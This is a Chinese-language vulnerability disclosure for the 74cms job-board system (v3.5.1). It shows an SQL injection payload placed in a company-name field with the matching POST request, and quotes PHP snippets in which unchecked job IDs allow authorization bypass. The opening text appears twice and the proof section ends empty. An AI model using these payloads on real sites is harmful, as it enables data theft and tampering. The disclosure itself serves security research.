### 简要描述: 骑士人才系统 2处越权+1处sql注入获取敏感信息 ### 详细说明: 这里我就不做代码分析了,直接看我操作 第一步,我们首先注册一个正常的企业用户 第二步,我们修改企业用户的信息 [<img src="https://images.seebug.org/upload/201410/2017122933dc98fe143d568c7e817b1e50bf691e.png" alt="16.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201410/2017122933dc98fe143d568c7e817b1e50bf691e.png) 公司名称',`jobs_name`=user() #-- sdd 然后我们访问url: POST /74cms_v3.5.1_20141015https://images.seebug.org/upload/wap/company/wap_company_jobs.php?act=jobs_edit_save HTTP/1.1 Host: localhost postdata: id=1&add_mode=1&days=0&jobs_name=xxxxx&nature=62&nature_cn=xxxx&topclass=1&category=4&subclass=569&category_cn=xxxxx&amount=111&district=4&sdistrict=93&district_cn=xxxxx&wage=58&wage_cn=2000~3000xxxx&sex=1&sex_cn=%E7%94%B7&education=69&education_cn=xxxx&experience=75&experience_cn=xxxx&graduate=0&contents=xxxxxxxxxxxxxx&contact=xxxxxxxxxxxxxx&telephone=029-88164598 查看发布的职位信息: [<img...
### 简要描述: 骑士人才系统 2处越权+1处sql注入获取敏感信息 ### 详细说明: 这里我就不做代码分析了,直接看我操作 第一步,我们首先注册一个正常的企业用户 第二步,我们修改企业用户的信息 [<img src="https://images.seebug.org/upload/201410/2017122933dc98fe143d568c7e817b1e50bf691e.png" alt="16.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201410/2017122933dc98fe143d568c7e817b1e50bf691e.png) 公司名称',`jobs_name`=user() #-- sdd 然后我们访问url: POST /74cms_v3.5.1_20141015https://images.seebug.org/upload/wap/company/wap_company_jobs.php?act=jobs_edit_save HTTP/1.1 Host: localhost postdata: id=1&add_mode=1&days=0&jobs_name=xxxxx&nature=62&nature_cn=xxxx&topclass=1&category=4&subclass=569&category_cn=xxxxx&amount=111&district=4&sdistrict=93&district_cn=xxxxx&wage=58&wage_cn=2000~3000xxxx&sex=1&sex_cn=%E7%94%B7&education=69&education_cn=xxxx&experience=75&experience_cn=xxxx&graduate=0&contents=xxxxxxxxxxxxxx&contact=xxxxxxxxxxxxxx&telephone=029-88164598 查看发布的职位信息: [<img src="https://images.seebug.org/upload/201410/20171347e608cb48d67d77af7cdf05cb5fd8aeaf.png" alt="17.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201410/20171347e608cb48d67d77af7cdf05cb5fd8aeaf.png) 下来我们看越权处: 第一处: 没有参与uid计算 wap_company_jobs.php: ``` // 暂停 职位 elseif($act=="jobs_pause") { //越权 $smarty->cache = false; $id=$_POST['id']; $sql="update ".table("jobs")." set display=2 where id=$id"; $db->query($sql)?exit("ok"):exit("err"); } ``` 第二处: ``` elseif($act=="jobs_regain") { $smarty->cache = false; $id=$_POST['id']; //越权 $sql="update ".table("jobs")." set display=1 where id=$id"; $db->query($sql)?exit("ok"):exit("err"); } ``` ### 漏洞证明:
